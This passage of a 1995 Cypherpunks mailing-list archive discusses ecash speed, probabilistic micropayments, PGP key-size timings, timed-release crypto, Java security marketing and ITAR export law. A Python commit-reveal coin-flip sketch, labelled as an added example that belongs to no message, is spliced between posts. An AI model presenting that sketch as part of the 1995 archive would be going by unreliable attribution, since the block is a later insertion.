> >> The point is that if the anonymity afforded by ecash is too costly in
> >> terms of time, then we may end up stuck with a non-anonymous system
> >> simply because that is the only one efficient enough to work. It would
> >> be good to find out if that is a serious problem.
>
> >I suspect that as CPU speed exponentiates this will become less and
> >less of a problem. It doesn't especially worry me.
>
> Consider, though, what happens in the current ecash system if it were
> used to charge a penny per page. You would click on a link in your web
> browser to go to the new page. It would set the GET request to the
> remote server as usual.
>
> The server would fire up a CGI script which will run the shop software.
> That software will make a TCP stream connection back to your ecash wallet
> software which is running on the system where your client is. It sends a
> request to get paid $.01. Assuming the wallet is configured to
> automatically approve such a payment, it will send a one penny coin to
> the shop software along the opened link. (This may also involve doing a
> PK encryption on the coin as an anti-theft measure; this aspect of the
> current ecash system is not documented AFAIK.)
>
> The shop software then opens a TCP stream connection to the bank, and
> forwards the coin there. The bank receives it, and checks the public
> key signature in the coin. It then compares the coin against every other
> coin which has ever been spent (within the validity period of the coin)
> to make sure it is not being doubly spent. If this all checks out it
> sends back some authentication message to the original server. The shop
> software then delivers the new page to the client browser.
>
> This all has to happen whenever you click on a link in your browser.
> Even with fast CPU's I think the extra step of connecting to the bank,
> having it check against all coins, and getting approval will be
> considerable for each link traversal.
>
> Hal
> --- end forwarded text
>
>
> -----------------
> Robert Hettinga (rah at shipwright.com)
> Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
> USA (617) 323-7923
> "Reality is not optional." --Thomas Sowell
> >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<
>
>
>

=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee at cybercash.com
318 Acton Street           +1 508-371-7148(fax)     dee at world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)

From mclow at owl.csusm.edu Thu Nov 9 12:30:29 1995
From: mclow at owl.csusm.edu (mclow at owl.csusm.edu)
Date: Fri, 10 Nov 1995 04:30:29 +0800
Subject: New address
Message-ID:

Everyone --

This morning, without any warning, the local university decided to change all their mail aliases. Mail sent to "mclow at coyote.csusm.edu" now bounces, and the new address is "mclow at mailhost2.csusm.edu".

Please update your address books. Sorry about that :-(

P.S. Those of you who send mail to Laurie, her email address is now "lclow at mailhost2.csusm.edu"

-- Marshall

Marshall Clow
Aladdin Systems
mclow at mailhost2.csusm.edu

Warning: Objects in calendar are closer than they appear.

From jimbell at pacifier.com Thu Nov 9 12:30:57 1995
From: jimbell at pacifier.com (jim bell)
Date: Fri, 10 Nov 1995 04:30:57 +0800
Subject: ecash speed
Message-ID:

>At 09:08 PM 11/8/95 -0800, Hal wrote:
>>Consider, though, what happens in the current ecash system if it were
>>used to charge a penny per page. You would click on a link in your web
>>browser to go to the new page. It would set the GET request to the
>>remote server as usual.
>
>For penny-a-page on-line services, unless ecash transaction costs are
>_radically_
>cheap, it probably makes more sense for the service to sell its own tokens,
>bought with (anonymous or non-anonymous) ecash, which you then trade for pages.
>No calculation required, just an on-line lookup for double-spending
>and you don't get your page if you double-spend. An alternative to them
>picking the token numbers is for you to give them the numbers and them
>to keep them in their database, but that's probably unlikely to be done
>and doesn't really buy you much privacy.

I think that one thing that's needed is the concept of probabilistic payments.
The problem: How do you pay, say, 1/10th of a penny for a good or service if the minimum denominated coin is a penny? This is important, because as we all know the cost of providing computer services of all kinds (and data transmission) can be expected to continue to drop as time progresses. If we allow the minimum size coin to control our lives, it will keep prices higher than they ought to be and prevent low-cost services from existing.

The answer, I suggest, is that the payer and payee should "flip a coin," actually a probability, such that the likelihood of making the payment times the size of the payment equals the intended payment. If a seller wants to sell access at 1/10th of a penny per page, he and I can flip a 10-sided coin (using encryption principles already established) leading to a 1/10 likelihood that I would have to pay 1 cent, and a 9/10 likelihood that I'll get the service for free. On the average, it'll be a payment of 1/10th of a cent.

From perry at piermont.com Thu Nov 9 12:32:17 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 10 Nov 1995 04:32:17 +0800
Subject: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091725.JAA17620@kiwi.cs.berkeley.edu>
Message-ID: <199511091951.OAA15564@jekyll.piermont.com>

Raph Levien writes:
> > On the other hand, it costs nothing by most people's standards to use
> > a 1024 bit key, so why not use one? I find that there is only a point
> > in using low security for anything in particular when there is a
> > perceivable cost to it -- if the cost is typing a different number
> > while doing key generation, I don't see why one should suffer the
> > tradeoff.
>
> Perhaps it costs you "nothing," Perry, but not all of us have the
> massively parallel 64-way interleaved banked memory nanosecond-latency
> box you have on your desk.

I've found that in practice the compression pass takes longer than the RSA pass for PGP.
If you accept the time for the file compression I don't see how you can have trouble with the 1024 bit RSA operation.

Perry

From anonymous-remailer at shell.portal.com Thu Nov 9 13:11:02 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 10 Nov 1995 05:11:02 +0800
Subject: Newt on Crypto
Message-ID: <199511080642.WAA04054@jobe.shell.portal.com>

On Tue, 7 Nov 1995, Bill Stewart wrote:

> >From John Young's posting CYB_lip of a column from the Washington Post
>
> > "At some point in the not-very-distant future," said
> > Speaker Newt Gingrich (R-Ga.) in an August interview in
> > Wired with computer guru Esther Dyson, "somebody is going
> > to have encryption you can't break.... Governments are not
> > going to be able to stop it."
>
> Newt's an optimist (from the government perspective.)
> At some point in the not-very-distant future,
> _everybody_ is going to have encryption the government can't break!

Obviously, Newt missed a briefing somewhere. His comments leave the impression that -- in the recent past and even at present -- we only had encryption which Governments could break.

This is nonsense. We've always had encryption which the government couldn't break. We've had it in the past. We have it at present. And we will have it in the future.

We've always had "non-breakable" private communication.

A simple example. If I was negotiating at a table with my legal team around me, and the opposing team across from me, and I wanted to send a message to my team that is for their eyes only, all I have to do is write something on the writing pad in front of me, and I have a secure communications channel to them. I can even write it in plain text. My team sees it, while the other team doesn't.

This _really_ should not surprise anyone ... especially Newt.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.
C. S. U. M. O. C. L. U. N. E.
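
[Added example, not part of any message in this archive.] jim bell's "ecash speed" message above proposes settling a 1/10-cent price by flipping a 10-sided coin "using encryption principles already established" without saying which ones. The Python sketch below assumes a SHA-256 commit-then-reveal flip; the names Merchant, commit, settle and the nonce-plus-value encoding are hypothetical.

```python
"""Probabilistic micropayment settled by a hash-commitment coin flip."""
import hashlib
import hmac
import secrets
from fractions import Fraction

COIN_CENTS = 1   # smallest coin, as in the post
SIDES = 10       # 1-in-10 chance of paying -> 1/10 cent on average


def commit(value: int, nonce: bytes) -> bytes:
    """Commitment to `value`: SHA-256 over nonce || 4-byte value (assumed encoding)."""
    return hashlib.sha256(nonce + value.to_bytes(4, "big")).digest()


class Merchant:
    """Payee side: picks its share of the flip and commits before seeing the payer's."""

    def __init__(self, sides: int = SIDES):
        self.value = secrets.randbelow(sides)
        self.nonce = secrets.token_bytes(32)   # hides the value inside the commitment

    def commitment(self) -> bytes:
        return commit(self.value, self.nonce)

    def reveal(self):
        return self.value, self.nonce


def settle(commitment, payer_value, revealed_value, nonce,
           sides: int = SIDES, coin: int = COIN_CENTS) -> int:
    """Payer-side check of the reveal; returns the cents owed for this round."""
    if not (0 <= payer_value < sides and 0 <= revealed_value < sides):
        raise ValueError("value out of range")
    if not hmac.compare_digest(commitment, commit(revealed_value, nonce)):
        raise ValueError("reveal does not match commitment")
    # The sum is uniform on 0..sides-1 as long as either party chose at random.
    return coin if (revealed_value + payer_value) % sides == 0 else 0


def run_round() -> int:
    """One honest exchange: commitment, payer's value, reveal, settlement."""
    merchant = Merchant()
    c = merchant.commitment()                  # 1. merchant -> payer
    payer_value = secrets.randbelow(SIDES)     # 2. payer -> merchant, after seeing c
    value, nonce = merchant.reveal()           # 3. merchant -> payer
    return settle(c, payer_value, value, nonce)


def swap_is_detected(payer_value: int = 3) -> bool:
    """A merchant that reveals a value other than the committed one is caught."""
    merchant = Merchant()
    c = merchant.commitment()
    value, nonce = merchant.reveal()
    swapped = (value + 1) % SIDES              # anything but the committed value
    try:
        settle(c, payer_value, swapped, nonce)
    except ValueError:
        return True
    return False


def expected_payment(sides: int = SIDES, coin: int = COIN_CENTS) -> Fraction:
    """Exact mean payment per round, enumerating every pair of choices."""
    nonce = b"\x00" * 32                       # constructed fixed nonce for enumeration
    total = sum(settle(commit(m, nonce), p, m, nonce, sides, coin)
                for m in range(sides) for p in range(sides))
    return Fraction(total, sides * sides)


if __name__ == "__main__":
    print("this round owes", run_round(), "cent(s)")
    print("expected payment per page:", expected_payment(), "cent")
    print("swapped reveal detected:", swap_is_detected())
```

The flip only fixes the amount fairly; it does nothing to make the losing payer actually hand over the coin, which still needs the payment system itself.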
From tcmay at got.net Thu Nov 9 13:33:34 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 05:33:34 +0800
Subject: Timed-release crypto and information economics
Message-ID:

At 6:52 PM 11/9/95, Beavis B. Thoopit wrote:
>> That's a pretty large number of assumptions:
>>
>>   tamper-proof delay line
>>   => tamper-proof crypto box ("transformation function with state")
>>   => tamper-proof delay line
>>
>> Why not just put a tamper-proof clock in the tamper-proof crypto box
>> and not bother with the delay lines?
>
>The tamper proof aspect is really secondary to the math question.
>The idea that if I set up a stream of bits through a transform, that
>the original state of the transform affects the final outcome after
>N iterations.

The tamper-proof (more correctly, "tamper-resistant" or "tamper-responding") hardware is so that attackers do not alter the clocks, as one example, to "speed up" the time release. Or grab the key, as another example.

(Cranking up the clock speed may or may not be possible and still have the device work, but it's still an attack to consider.)

If the attacker can grab the internal state of the device, he can of course run the "transform" talked about above on his equipment.

>If the transform exists, it will ease/eliminate the reliance on the
>"economics" of cryptography to build a tamper-proof physical device.

You'll need to more carefully argue your thesis. I cannot imagine a method, save perhaps for quantum computing techniques, which can avoid the need for "secure secrets," either via a person keeping a secret or a box keeping a secret. If the box is not secure against tampering, and an attacker gets in, he effectively "knows" all of the secrets.

BTW, the "launch into solar orbit" scheme that has again surfaced here is just a variant of making the costs of an attack very high.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From anonymous-remailer at shell.portal.com Thu Nov 9 13:45:32 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 10 Nov 1995 05:45:32 +0800
Subject: Many Topics are Appropriate for Discussion Here
Message-ID: <199511092020.MAA28155@jobe.shell.portal.com>

On Fri, 3 Nov 1995, Perry E. Metzger wrote:

>Timothy C. May writes:
>> Implying that the reason Bellovin and Karn left the list--if they did, as I
>> haven't checked--was because of "off-topic" posts seems to be a stretch.
>
>They both left because the noise level was too high and the
>cryptography content too low. I'll ask Steve to comment if you insist.

I'd be interested as to whether or not they are tuned in here, either directly or indirectly through some type of list reflector/filter.

Some people might just read this list and not post. They may not have anything to say or contribute, or maybe they just don't want to add to list noise, but hopefully they do keep up with the mailing list discussion as a first priority. Just because someone doesn't post, doesn't mean that they've left, or not listening. It just means that we aren't hearing from them.

Steve Bellovin, (if this is the AT&T, Steve Bellovin) has corresponded with me. He wrote me about the security flaw in Netscape I detailed to this list, so I can assume from that, that he IS aware of it and is still aware of the list (if it is the AT&T Steve Bellovin, I mean). If not, my mistake. I suppose I could ask him whether he is reading this list, or not.

Is Steve AT&T's Security Officer or something?
He never really introduced himself when he emailed me, and he never presented me with any credentials or letters of introduction. But if he is so well known (news to me), and has a well known reputation -- probably a reputation on a par with noted international electro-virologist, "Dr. Frederick B. Cohen" -- then he's probably a very busy fellow.

I wonder who he is at AT&T?

>> Lots of other people have joined the list, and the subscription base has
>> done from an earlier plateau of about 700 subscribers to more than 1200
>> recently.
>
>I don't care about quantity. Steve Bellovin is worth 500 subscribers
>-- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
>lot of this stuff than most of what passes for careful thought from
>the average person here.

Yes. He is worthwhile from what I have seen. He has said that he will probably be consulted at AT&T if there is ever any type of Internet issue. I'm not sure if that makes him one of AT&T's Internet consultants or whether he is one of the responsible persons at AT&T. But I'd rather let Steve speak for himself on that.

I don't know if Steve has the explicit authority to have the Chairman take his call as an example and I doubt that -- on his pen -- a full Board Meeting could be convened to bring all opinions forward to the table, so that those who are CHARGED with decision making CAN make decisions. I think he probably has to go through channels.

(Direct access to senior management is generally part and parcel of any functioning security policy. It has to be. And I assume that AT&T does have one.)

I'm slowly working through my mail queue, and will probably reply soon to Steve's email. It's flagged. And I can probably ask at that time whether he DOES read this list, and settle the issue.
I really don't want to bother him though with trivial questions and comments when he's probably busy forming an inter-departmental Working Group to *carefully* deal with the Netscape issue -- a large committee to focus on the problem that blindsided AT&T, a committee to focus on deployment strategies.

I assume that that's why Steve's not posting to this list and providing free entertaining content to Internet subscribers. He's probably too DAMNED busy.

(And not getting paid NEARLY enough ;)

I hope that AT&T's Netscape Security Audit Working Group's first order of business is to elect one person to deal with external email, rather than having each individual employee from AT&T send, _yours truly_ a "Me Too" ... "I'm responsible" ... "this is MY turf" reply.

But that's not a list discussion so I'll take it off-line where it belongs, and keep Perry as happy as I can.)

That discussion ... the "everyone at AT&T is responsible" one, belongs with the Netscape one ... the one where "no one at Netscape is responsible", the one where "nobody from Netscape ever replies" to your email.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.
C. S. U. M. O. C. L. U. N. E.

From tcmay at got.net Thu Nov 9 13:45:43 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 05:45:43 +0800
Subject: Market Value of Web Pages
Message-ID:

At 6:51 PM 11/9/95, Bill Frantz wrote:

>BTW - I don't think we should be talking about a penny/page cost because it
>is way too high for the current market. For example, my copy of Applied
>Cryptography V2 cost about $.067/page AND came with the media to keep it
>"forever". My (used) copy of Snow Crash cost closer to a penny/page and
>also came with the media. I would think that somewhere between 1/100 to
>1/10 of a penny/page is closer to the current market value of the page
>content.
With all due respect to Bill--his mention of agorics tells me he knows something about computational ecologies and markets--, there is no reasonable way to say what price is "closer to the current market value of the page content," except by what the market will bear!

Yes, a paperback novel is a penny a page or so. But a 5-page consultant's report that sells for $2000 has a "market value" to someone of $400 a page. You can all think of all kinds of other examples.

Closer to home, a copy of "Penthouse" which sells for $5 and which has perhaps 10 photographs of "interest" to someone can be said to roughly have a value of $.50 per Web page of equivalent material. "Penthouse" and "Playboy," to name just two examples, have "members only" Web pages, and they are apparently doing OK financially.

(Other "members only" Web pages may also be doing well....it is _these_ Web pages that provide an example of paid access in contrast to some other examples, where even a fraction of a cent per page is too much.)

Personally, I've yet to pay for a Web page. Too much "free" stuff, too much stuff coming out of the firehose. (And a lot of JPEGs from the "members only" page are being "liberated" and posted--often through remailers--to the alt.binaries.pictures.* "free" newsgroups, or placed on other Web pages.)

I expect this to someday change, and to pay for some things at a fraction of a cent per hit, some other things for a few cents a hit, and maybe even some things at dollars per hit.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
From tcmay at got.net Thu Nov 9 13:54:39 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 05:54:39 +0800
Subject: ecash speed
Message-ID:

At 8:21 PM 11/9/95, jim bell wrote:

>The problem: How do you pay, say, 1/10th of a penny for a good or service
>if the minimum denominated coin is a penny? This is important, because as
>we all know the cost of providing computer services of all kinds (and data
>transmission) can be expected to continue to drop as time progresses. If
>we allow the minimum size coin to control our lives, it will keep prices
>higher than they ought to be and prevent low-cost services from existing.

A non-problem. Ask any business whether the "minimum denominated coin" is a penny. Perhaps the minimum denominated _coin_ is a penny, in the U.S., but vast numbers of widgets are priced at sub-cent levels.

True, no purchase orders are written for sub-cent prices, but this is a transaction cost issue, not something basic to the currency. (Likewise, Hal's concerns about ecash speed are basically transaction cost issues.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From jlasser at rwd.goucher.edu Thu Nov 9 13:56:29 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Fri, 10 Nov 1995 05:56:29 +0800
Subject: PGP Comment feature weakens remailer security
In-Reply-To: <199511091413.JAA15288@jekyll.piermont.com>
Message-ID:

On Thu, 9 Nov 1995, Perry E. Metzger wrote:

> > I agree entirely. That's why my PGP key at school is 382 bits. It's a
> > lot easier to compromise my machine than factor a 382 bit number.
>
> On the other hand, it costs nothing by most people's standards to use
> a 1024 bit key, so why not use one? I find that there is only a point
> in using low security for anything in particular when there is a
> perceivable cost to it -- if the cost is typing a different number
> while doing key generation, I don't see why one should suffer the
> tradeoff.

Actually, it makes a sort of sense; if I see a 384 bit PGP key, it strikes me as insecure, and I really consider it; unless it says so on the 1024 bit key, I wouldn't think about it much. It's useful as a human identifier, assuming it's not the weakest link in the chain.

Jon

------------------------------------------------------------------------------
Jon Lasser (410)494-3072
Visit my home page at http://www.goucher.edu/~jlasser/
You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

From raph at CS.Berkeley.EDU Thu Nov 9 14:03:59 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Fri, 10 Nov 1995 06:03:59 +0800
Subject: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091951.OAA15564@jekyll.piermont.com>
Message-ID: <199511092046.MAA16851@kiwi.cs.berkeley.edu>

> I've found that in practice the compression pass takes longer than the
> RSA pass for PGP. If you accept the time for the file compression I
> don't see how you can have trouble with the 1024 bit RSA operation.

When in doubt, measure.

The following measurements were done on a DEC Alpha 3000/300, 150Mhz, Digital Unix 3.2. The first test file was an email I sent this morning, with a size of 5379 bytes, which is typical for the email I send. The second test file was the PostScript version of a 52 page tech report done by our research group this summer, with a size of 656676 bytes. The version of PGP used was MIT 2.6.2, compiled with the default osf configuration (-O compile flag).
In all cases, user time only (not system time) is measured. This seems reasonable, because neither compression nor RSA inherently require I/O. The standard deviation on timings was somewhere around 5 or 10 ms. I took the average "by eye" over about ten runs each. I did not include signing tasks, as neither PGP/MIME signing nor clearsigning include a compression step.

Task 1: encrypt file, generating compressed output (RSA is quadratic)

keysize  compression  time      file size in    file size out
---------------------------------------------------------
    382  on           95 ms       5379 bytes       2205 bytes
    382  off          90 ms       5379 bytes       8165 bytes
   1024  on           90 ms       5379 bytes       2315 bytes
   1024  off          85 ms       5379 bytes       8275 bytes
    382  on           3.86 s    656676 bytes     255575 bytes
    382  off          2.43 s    656676 bytes     920984 bytes
   1024  on           3.84 s    656676 bytes     255685 bytes
   1024  off          2.43 s    656676 bytes     921090 bytes

Task 2: decrypt file from Task 1 (RSA is cubic)

keysize  compression  time      file size in    file size out
---------------------------------------------------------
    382  on           135 ms      2205 bytes       5379 bytes
    382  off          140 ms      8165 bytes       5379 bytes
   1024  on           1.14 s      2315 bytes       5379 bytes
   1024  off          1.14 s      8275 bytes       5379 bytes
    382  on           1.43 s    255575 bytes     656676 bytes
    382  off          2.68 s    920984 bytes     656676 bytes
   1024  on           2.42 s    255685 bytes     656676 bytes
   1024  off          3.74 s    921090 bytes     656676 bytes

We can conclude that for small files, the size of a typical email, compression is completely negligible, and the effect of key size is significant. We can also conclude that for large compressible files, compression increases encryption time by roughly two seconds per MB, but decreases decryption time by roughly the same amount (by virtue of having to decrypt fewer bytes).
Raph From moroni at prufrocks.scranton.com Thu Nov 9 14:15:56 1995 From: moroni at prufrocks.scranton.com (Moroni) Date: Fri, 10 Nov 1995 06:15:56 +0800 Subject: Exporting software doesn't mean exporting In-Reply-To: <199511080054.QAA29419@email.pdcorp.com> Message-ID: Where can one get a copy of ITAR ? Secondly , has anyone written any books on the subject and if so who and what? Thanks in advance, Deirdre From llurch at networking.stanford.edu Thu Nov 9 15:01:44 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Fri, 10 Nov 1995 07:01:44 +0800 Subject: Exporting software doesn't mean exporting In-Reply-To: Message-ID: On Thu, 9 Nov 1995, Moroni wrote: > Where can one get a copy of ITAR ? Secondly , has anyone written any > books on the subject and if so who and what? I believe ITAR is 22 USC $ 2278 and environs, which should be at http://www.law.cornell.edu/uscode/22/2778.html. I can't quote from it right this second because there seems to be a routing problem inside sprintlink (must be SAIC censoring us). Books, I dunno. -rich From sameer at c2.org Thu Nov 9 15:32:01 1995 From: sameer at c2.org (sameer) Date: Fri, 10 Nov 1995 07:32:01 +0800 Subject: Many Topics are Appropriate for Discussion Here In-Reply-To: <199511092020.MAA28155@jobe.shell.portal.com> Message-ID: <199511092229.OAA05862@infinity.c2.org> > Is Steve AT&T's Security Officer or something? He never really introduced > himself when he emailed me, and he never presented me with any credentials > or letters of introduction. But if he is so well known (news to me), and > has a well known reputation -- probably a reputation on a par with noted > international electro-virologist, "Dr. Frederick B. Cohen" -- then he's > probably a very busy fellow. Steve's reputation is not on par w/Dr Fred's. Steve is actually respected. I will refrain from commenting on Dr. Fred's reputation. 
("If you don't have anything nice to say...") -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From anonymous-remailer at shell.portal.com Thu Nov 9 15:41:11 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 10 Nov 1995 07:41:11 +0800 Subject: Java insecurity - long - argumentative - you are warned. Message-ID: <199511092241.OAA14102@jobe.shell.portal.com> On Mon, 6 Nov 1995, Ray Cromwell wrote: > > WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS > > A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED! > > > > >From the Java Web pages (as combined in Firewalls/BoS): > > > > > The language's security features (not just applets): > > [Long list of bullshit deleted] I don't think that this is *bullshit* ... the questions I mean ... but, I for one am tired of people promoting products in a manner which flies in direct contravention of expert consensus. No one would accept a pharmaceutical company that says a product is X, if it is in fact Y. And no one would question if a researcher came forward, and corrected the company and set the record straight. This is generally called ETHICS ... not bullshit. The problem is not in the messenger, it's in the organization that is simply willing to roll the dice when it comes to public safety and security. > "Dr" Cohen. If you want to criticize Java, why not read the technical > papers rather than spewing questions and assertions based from ignorance. I've got a better suggestion. Why don't companies like Sun ensure that their sales and technical material is reviewed for gross inaccuracies and/or misrepresentations? > When you want to criticize a piece of engineering, you don't look > at the feature list or white paper. 
As is made clear in your post, > you don't know the meanings of phrases used in the Java paper, nor do > you understand how the machinery works. (e.g. byte code verifier) I won't speak for Dr. Frederick B. Cohen, but I will speak for myself, and provide this list with but a single example. And I won't quote from a white paper, but will instead quote from some Sun literature which crossed my desk the day before yesterday, literature that Sun provided as part of their worldwide introduction of Ultra workstations. What they called a "breakthrough for network computing". What follows is not "technical commentary", but is simply what they provide as information to MIS managers, Sun resellers and invited press. This copyrighted brochure, which looks like it was printed 11/95 makes the following verbatim comment on the "Java Internet Application Language". > Java has an extensive library of routines for coping with TCP/IP > protocols such as HTTP and FTP. Java applications can open and access > objects across the net via URLs with the same ease that programmers are > used to when accessing a local file system. > > Java is intended to be used in networked/distributed environments. > Therefore, much emphasis has been placed on security. The product > enables programmers to create virus-free, tamper-free systems through > public-key encryption authentication techniques. Hmmm, maybe I'm confused, but this is grossly overselling a product's capabilities, and is setting absolutely unrealistic expectations -- expectations which are doomed from the start never to be met, let alone exceeded. This expectations/satisfaction gap will ultimately lead to customer dis-satisfaction. Then again ... the solution to virus-free, tamper-free systems with TCP/IP protocol "coping" has always been a problem that's been waiting for a "product solution" to help all of us to enable our programmers. God help us all. 
As part of my copious spare time, I might make a personal comment which hopefully gets to some of the powers that be at Sun. Firstly, I wasn't aware that HTTP was a TCP/IP protocol. I didn't even think that there was a draft RFC on it. I thought that all that there was, was an internet-draft, which is a different kettle of fish. I never realized that HTTP was on standards track, and part of the application protocol. It really is news to me. But that's a quibble, and I'm really behind on my reading, so, I could be wrong. My second comment is perhaps more actionable. I would much rather that a product clearly and definitively state what it has implemented. Maybe something like the following. Implementation of the following IETF (Internet Engineering Task Force) protocols: IP (RFCs 791, 894; MIL-STD 1777); UDP (RFC 768); TCP (RFC 793, MIL-STD 1778); ARP (RFC 826); RARP (RFC 903); ICMP (RFC 792); BootP (RFCs 951, 1048); RIP (IDEA004); DNS (RFCs 1034, 1035); Internet Subnetting (RFC 950); and Internet Assigned Numbers (RFC 1010). Maybe, also that the product complies with Requirements for Internet Hosts Communications Layers (RFC 1122) and with A Standard for the Transmission of IP Datagrams over IEEE 802 Networks (RFC 10.. something or other). This is far more informative (ironically) than saying that: > Java has an extensive library of routines for coping with TCP/IP > protocols such as HTTP and FTP. Hmmm, FTP. That's RFC 7?? or something like that, isn't it?? As an example, I'd like to know how Java handles a file, that is called foo.bar.au. Does a .au file refer to an audio file, or does it refer to something from Australia?? I'll stop here, and not continue with my deconstruction, especially the part that continues: > Java is intended to be used in networked/distributed environments. > Therefore, much emphasis has been placed on security.
The product > enables programmers to create virus-free, tamper-free systems through > public-key encryption authentication techniques. To every problem, a product solution ... we can leave mathematicians at the door, and simply enable our programmers. Those technical analyst rocket scientist types, really can't know anything, at all. Can they? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. P.P.S. To Sun: I was also a bit disappointed that nobody thought to show what a vice-presidential tribble looks like on satellite simulcast ... then again, I was thrilled with the female "trader" who spoke about patterns in chaotic systems to her cab driver. Did she work the back office at Daiwa, or something?? Probably believes in runs of luck, too ... From junger at pdj2-ra.F-REMOTE.CWRU.Edu Thu Nov 9 15:56:00 1995 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Fri, 10 Nov 1995 07:56:00 +0800 Subject: Exporting software doesn't mean exporting (was: Re: lp ?) Message-ID: In our recent correspondence on this list with the heading ``Re: Exporting software doesn't mean exporting'', Michael Froomkin and I seem to have two different areas of disagreement: (i) whether the ITAR's provisions relating to cryptographic software apply to foreign persons who disclose (or transmit) cryptographic software to another foreign person without the United States and (ii) whether there is a separation of powers (or ultra vires) argument that can be made against the application of those provisions to anyone, foreign or estados-unidian, in the United States or abroad. In this message I will limit myself to the first area of disagreement and will try to deal with the second area in a later message.
As I tried to say, somewhat clumsily, before, and may have caused some confusion in doing so, there are so many reasons why the provisions of the ITAR relating to cryptographic software are unconstitutional and so even more reasons why those provisions are unenforceable, that I find it difficult to discuss whether those unenforceable and unconstitutional provisions can be enforced against a foreign person who discloses software to another person outside of the United States. I am, after all, firmly convinced that those provisions cannot be enforced against him, because I do not believe that those provisions can be enforced against anyone. (Though in some ways a foreign person outside the United States is more vulnerable than a United States person or a foreign person within the United States, since the outside foreign person has (arguably) less constitutional protections.) When I said (But of course the ITAR as applied to cryptographic software--and that is all that I am talking about--are so unconstitutional in so many different ways that nothing is going to turn on that one issue.) the one issue that I was referring to was the status of outside foreign persons and, of course, that is not the issue that ``is now in front of two district judges.'' (I hope that the issue before the two federal district judges is the issue of the constitutionality of the ITAR's provisions relating to cryptographic software, but both cases raise relatively narrow factual issues and may end up being resolved (if one dares call such a result a resolution) on the grounds that the issues are not appealable under the Administrative Procedure Act or that administrative remedies were not exhausted or even that the provisions of the ITAR in question are unconstitutional but that that determination that is good for that day and that train only.) Now Mr.
Froomkin says: In short, in this particular case the ACEA, and by extention the ITAR, doesn't "say what it says" it "says what it must mean". (And I dare him to make that assertion in the faculty lounge at Miami when some of the more critical and analytically inclined members of the Miami law faculty are present.) I would take this as an admission that the ACEA and the ITAR does say what it says (even if it must mean something else) were it not for the fact that--and this was my ``ultra vires'' point--that the ACEA doesn't say it. (In discussing the quoted passage I am assuming that ``extention'' must mean ``extension'' and that it is not used as the opposite of ``intention'', if only because I don't know what the latter would be. But on the other hand the only dictionaries I have to hand are the COD and the on-line version of Webster's Collegiate.) The AECA doesn't contain any definition of ``export'' whatsoever; the whole issue that we are discussing turns on the interpretation of what the ITAR says when it defines ``export'' as including: Disclosing (including oral or visual disclosure) or transferring technical data to a foreign person, whether in the United States or abroad .... Now Mr. Froomkin seems to be contending that this language must be interpreted as it would be interpreted by some sort of neo-Platonic court (probably sitting in Rawl's original position by designation), which he calls ``any court''. The contention is: any court construing the ACEA would inevitably read the prohibition on "exporting" to a foreign person as not applying where the nation lacks jurisdiction. Now it was my argument--which Mr. 
Froomkin helpfully calls an ``ultra vires'' argument--that any court reading the ACEA would notice (i) that there is no language in that act defining ``export'' and (ii) that ``export'' does not mean disclosing, or even transferring, information (which is what cryptographic software is) and (iii) that, in consequence, the Office of Defense Trade Controls exceeded its congressionally granted authority, and therefore its constitutional authority, when it came up with the perverse provision that is at issue here. But that is the subject of my other, as yet unwritten, message. Now I take it that Mr. Froomkin's contention turns on the claim that Congress lacks jurisdiction under international law to pass a statute--or authorize a regulation--that makes it a crime for a foreign person to transmit something to another person when both of them are outside the United States. So as to avoid the other constitutional and ultra vires and so on issues, let us assume that Congress were to amend the ACEA to make it a crime ``to transfer a cryptographic device to a foreign person within the United States or abroad without first obtaining a license or a waiver of jurisdiction from the Office of Defense Trade Controls.'' And now assume that someone, F, who is a foreign person and who has never been in the United States transfers a 